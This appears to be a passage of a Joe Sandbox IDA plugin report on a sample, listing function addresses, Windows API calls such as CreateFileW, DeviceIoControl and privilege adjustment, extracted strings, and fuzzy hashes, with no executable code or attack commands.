                                                    • Instruction ID: 5a9db48a7ee800e2f169eb175cbba7edb72ab6b59cafedc6e9c43babf6590764
                                                    • Opcode Fuzzy Hash: 7ecf72b9a802cc8559e0326d1f4c23dd1549747322943175324f52bf2c4fec62
                                                    • Instruction Fuzzy Hash: 6AF0E2715427104BDB3056698A483D333D88B15331F149B2FD4F2A33D2CB7C58484B69
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 004054B4
                                                      • Part of subcall function 00409DAE: __EH_prolog.LIBCMT ref: 00409DB3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 98767e5e22dcf5679d0ae1ea0e9db1b8aa2809052c515532c422abeb7ca8b044
                                                    • Instruction ID: 223ccfc1114ac4878ddad171de1f9205b92fae00e5399885b2b6ad6e8ea0d63d
                                                    • Opcode Fuzzy Hash: 98767e5e22dcf5679d0ae1ea0e9db1b8aa2809052c515532c422abeb7ca8b044
                                                    • Instruction Fuzzy Hash: 1601AF71911694DEE705F7A5C1257EDBBA4DF14308F00408FA496632C3CBF81B88CBA6
                                                    APIs
                                                      • Part of subcall function 00409E2C: _wcspbrk.LIBCMT ref: 00409E3D
                                                    • FindClose.KERNELBASE(00000000,00000800,000000FF,?,?,?,?,004081A3,?,?,00000000,?,00000800), ref: 00409474
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CloseFind_wcspbrk
                                                    • String ID:
                                                    • API String ID: 2190230203-0
                                                    • Opcode ID: 65c18560fadcf7c0b12ab435d75e3f3e99c3a981f13e924850ff3214d817b1e9
                                                    • Instruction ID: 32f9e3d0d340718320f944d82a866e19189bde616d291a643fecb61f20036053
                                                    • Opcode Fuzzy Hash: 65c18560fadcf7c0b12ab435d75e3f3e99c3a981f13e924850ff3214d817b1e9
                                                    • Instruction Fuzzy Hash: 02F0F635008380AACA615B74C804BCB7B945F55324F108A1EB1F8221E3C679145ADB6A
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00406E46
                                                      • Part of subcall function 00415195: __EH_prolog.LIBCMT ref: 0041519A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 56eb0443e2032b94d43a3735223f9f2ecb291693dbd055469d35a2ec73a7267f
                                                    • Instruction ID: 4cf58e0045ef2d5aa05767268f41b5feae0d3bcf362e2958875cd51dc7c2c9e9
                                                    • Opcode Fuzzy Hash: 56eb0443e2032b94d43a3735223f9f2ecb291693dbd055469d35a2ec73a7267f
                                                    • Instruction Fuzzy Hash: 3CE02232901600EBC329AB28D4023FEF375EFC1728F00072FE022632C1DBB86D418658
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset
                                                    • String ID:
                                                    • API String ID: 2102423945-0
                                                    • Opcode ID: d1c248c132d394c9c0078804562d49f71b4f7b3fce7792e7db05c9271be2713d
                                                    • Instruction ID: e6df6b1557e2ba54ca6f24c8125e515e1d94db030c2dd2b6d90ccbe533dd751d
                                                    • Opcode Fuzzy Hash: d1c248c132d394c9c0078804562d49f71b4f7b3fce7792e7db05c9271be2713d
                                                    • Instruction Fuzzy Hash: 83E0CD7190935035E321511D9C04FA7B6D84B91734F19C42FF098A33C2D1BC5C418769
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041E9CC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
                                                    • Instruction ID: f0a1ddbc7de6a6961978f51a4be97290eeddf9fac4efb7790fcf905564f07201
                                                    • Opcode Fuzzy Hash: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
                                                    • Instruction Fuzzy Hash: 1DD05E7A6503495AEB105F716C09B763BDCE7843A5F144436B90DC6190F674C590C548
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00408A62,?,00408C38,?,00000000,00000800,?,00000000), ref: 004089EE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
                                                    • Instruction ID: b64b8a54e65d8e7b74f8b503db865f06bf3f068ce8444fbd4636c0a2ed47c6d8
                                                    • Opcode Fuzzy Hash: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
                                                    • Instruction Fuzzy Hash: 53C0127165004052CE2055384A894AB364697433667684AB6F076D11D0CB3ACC42F915
                                                    APIs
                                                    • SendDlgItemMessageW.USER32 ref: 0040D221
                                                      • Part of subcall function 0040CE09: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CE1A
                                                      • Part of subcall function 0040CE09: GetMessageW.USER32 ref: 0040CE2B
                                                      • Part of subcall function 0040CE09: TranslateMessage.USER32(?), ref: 0040CE35
                                                      • Part of subcall function 0040CE09: DispatchMessageW.USER32(?), ref: 0040CE3F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchItemPeekSendTranslate
                                                    • String ID:
                                                    • API String ID: 4142818094-0
                                                    • Opcode ID: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
                                                    • Instruction ID: 0d2ea25ad04ad0a5d18f138e9db18183f4d7f5a67fb936a8ecc2db4c4dad53f1
                                                    • Opcode Fuzzy Hash: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
                                                    • Instruction Fuzzy Hash: C3C01231240300ABD7117B10DD47F1A3552BB84705F5081397740340F2C57548329A89
                                                    APIs
                                                    • _doexit.LIBCMT ref: 004212D1
                                                      • Part of subcall function 00421199: __lock.LIBCMT ref: 004211A7
                                                      • Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 004211DE
                                                      • Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 004211F3
                                                      • Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 0042121D
                                                      • Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 00421233
                                                      • Part of subcall function 00421199: __decode_pointer.LIBCMT ref: 00421240
                                                      • Part of subcall function 00421199: __initterm.LIBCMT ref: 0042126F
                                                      • Part of subcall function 00421199: __initterm.LIBCMT ref: 0042127F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 1597249276-0
                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction ID: 0312a6c3b2f7289cb8feed2c6a78f266c5bde82c565949ac2978f4db14a7e252
                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction Fuzzy Hash: 64B0927268020C33EA202942AC03F263A0D87D0B64E640021BA1C1D1A5A9B2A961808D
                                                    APIs
                                                    • SetEndOfFile.KERNELBASE(?,00407E6C,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 004089D2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
                                                    • Instruction ID: 8764dd92a4aeea9fc6a797bc89121622734c807ffe49c2e46d1e29d47898f422
                                                    • Opcode Fuzzy Hash: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
                                                    • Instruction Fuzzy Hash: 45B011303A000A8B8F202B30CE088283A20EB2230A30082B0A02AC80A0CB23C023AA00
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNELBASE(?,0040D5D6,0042A644,00000000,?,00000006,?,00000800), ref: 0041980A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                    • Instruction ID: 175a8f5435bd407339ccdaf5ebd2187c03bf393c5a072438874265726e840e79
                                                    • Opcode Fuzzy Hash: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                    • Instruction Fuzzy Hash: 98A0123039400647CA100F34CD0A82575505760B02F0086307006C00A0CB304430A505
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: DestroyDialogIconItemMessageSend
                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                    • API String ID: 3309745630-1840816070
                                                    • Opcode ID: 749a3dea07884193612789b54596e642b0e78fedcf72ff924081d4045fee8b6b
                                                    • Instruction ID: 827be73114fe76e2aba02d4ea3136fc84fceb4fba69d84f61c2c98601b35f17e
                                                    • Opcode Fuzzy Hash: 749a3dea07884193612789b54596e642b0e78fedcf72ff924081d4045fee8b6b
                                                    • Instruction Fuzzy Hash: 52A16471A4021CBBEB21EFE0CC85FEB777CEB04704F400466BA05E61D1D679AE5A8B65
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00406738
                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001,?,00406B02,00000000,?,-000065E8,00407C07,?), ref: 004067A7
                                                    • CloseHandle.KERNEL32(00000000), ref: 004067B7
                                                    • _wcslen.LIBCMT ref: 004067EF
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000001,?,00406B02,00000000,?,-000065E8,00407C07,?,?,?,?,?,?), ref: 0040685B
                                                    • _wcscpy.LIBCMT ref: 00406875
                                                    • _wcslen.LIBCMT ref: 00406881
                                                    • _wcscpy.LIBCMT ref: 004068C9
                                                      • Part of subcall function 004064B1: GetCurrentProcess.KERNEL32(00000020,?), ref: 004064C0
                                                      • Part of subcall function 004064B1: OpenProcessToken.ADVAPI32(00000000), ref: 004064C7
                                                      • Part of subcall function 004064B1: LookupPrivilegeValueW.ADVAPI32 ref: 004064E7
                                                      • Part of subcall function 004064B1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004064FC
                                                      • Part of subcall function 004064B1: GetLastError.KERNEL32 ref: 00406506
                                                      • Part of subcall function 004064B1: CloseHandle.KERNEL32(?), ref: 00406515
                                                    • _wcscpy.LIBCMT ref: 004068ED
                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406997
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 004069D6
                                                    • CloseHandle.KERNEL32(00000000), ref: 004069E1
                                                    • GetLastError.KERNEL32 ref: 004069F3
                                                    • RemoveDirectoryW.KERNEL32(00000000), ref: 00406A28
                                                    • DeleteFileW.KERNEL32(00000000), ref: 00406A30
                                                      • Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
                                                      • Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
                                                      • Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
                                                      • Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
                                                      • Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateErrorFileHandleLast_wcscpy$DirectoryProcessToken_wcslen$AdjustControlCurrentDeleteDeviceFreeH_prologHeapLookupOpenPrivilegePrivilegesRemoveValue___sbh_find_block___sbh_free_block__lock
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3709686777-3508440684
                                                    • Opcode ID: c258219808b2eda87518a90a5aa7d19e8d2121a749bddc8e958efd46b88a6f3c
                                                    • Instruction ID: facf686eb702fd5a5c240de56c53d3d43b4e883ba41454b7b8032450fdd1dc0c
                                                    • Opcode Fuzzy Hash: c258219808b2eda87518a90a5aa7d19e8d2121a749bddc8e958efd46b88a6f3c
                                                    • Instruction Fuzzy Hash: 70A1B471600214AFDB21EF64CC45BEA77A8EF04304F00457FF95AE7291D778AAA4CB69
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __byteswap_ulong
                                                    • String ID:
                                                    • API String ID: 2309504477-0
                                                    • Opcode ID: 6e684b15e74e9267a8b2bb02a5393d20d4bf3e570c3c201c546b3778de1fd3cf
                                                    • Instruction ID: f2fc5d2990e61c7ba140b040ae62fd3db552cd59a2b01400d84158058e3a83a1
                                                    • Opcode Fuzzy Hash: 6e684b15e74e9267a8b2bb02a5393d20d4bf3e570c3c201c546b3778de1fd3cf
                                                    • Instruction Fuzzy Hash: F991E675A007048FCB64DF5AC881A9AB7F1FF48308F0445AEE55AE7762D734E9948F48
                                                    APIs
                                                      • Part of subcall function 004199F3: GetDC.USER32 ref: 004199F7
                                                      • Part of subcall function 004199F3: GetDeviceCaps.GDI32 ref: 00419A02
                                                      • Part of subcall function 004199F3: ReleaseDC.USER32(00000000,00000000), ref: 00419A0D
                                                    • GetObjectW.GDI32(00000200,00000018,?), ref: 00419A4B
                                                    • CoCreateInstance.OLE32(0042B198,00000000,00000001,0042B090,?,00000000,?), ref: 00419A7B
                                                      • Part of subcall function 00419889: GetDC.USER32 ref: 00419895
                                                      • Part of subcall function 00419889: CreateCompatibleDC.GDI32(00000000), ref: 004198A5
                                                      • Part of subcall function 00419889: CreateCompatibleDC.GDI32(?), ref: 004198AC
                                                      • Part of subcall function 00419889: GetObjectW.GDI32(?,00000018,?), ref: 004198BA
                                                      • Part of subcall function 00419889: CreateCompatibleBitmap.GDI32 ref: 004198DC
                                                      • Part of subcall function 00419889: SelectObject.GDI32 ref: 004198EF
                                                      • Part of subcall function 00419889: SelectObject.GDI32 ref: 004198FA
                                                      • Part of subcall function 00419889: StretchBlt.GDI32 ref: 00419918
                                                      • Part of subcall function 00419889: SelectObject.GDI32 ref: 00419922
                                                      • Part of subcall function 00419889: SelectObject.GDI32 ref: 0041992A
                                                      • Part of subcall function 00419889: DeleteDC.GDI32 ref: 00419933
                                                      • Part of subcall function 00419889: DeleteDC.GDI32 ref: 00419938
                                                      • Part of subcall function 00419889: ReleaseDC.USER32(00000000,?), ref: 0041993E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Object$CreateSelect$Compatible$DeleteRelease$BitmapCapsDeviceInstanceStretch
                                                    • String ID: (
                                                    • API String ID: 189428636-3887548279
                                                    • Opcode ID: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
                                                    • Instruction ID: 3e8188f6aa3c40b75b3dc49b223c9d0ef22faecde0b71e70af5579e3dbcfa49d
                                                    • Opcode Fuzzy Hash: 5944d7030503ee4e6fe2997628098f357063f2f40a147e5def9495c7f969f20f
                                                    • Instruction Fuzzy Hash: 74611A75A00248AFDB00DFA5C898EDEBBB9FF89704B10845AF805EB250D775EE51CB64
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00423AFE
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B13
                                                    • UnhandledExceptionFilter.KERNEL32(`D), ref: 00423B1E
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00423B3A
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00423B41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: `D
                                                    • API String ID: 2579439406-1070873967
                                                    • Opcode ID: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
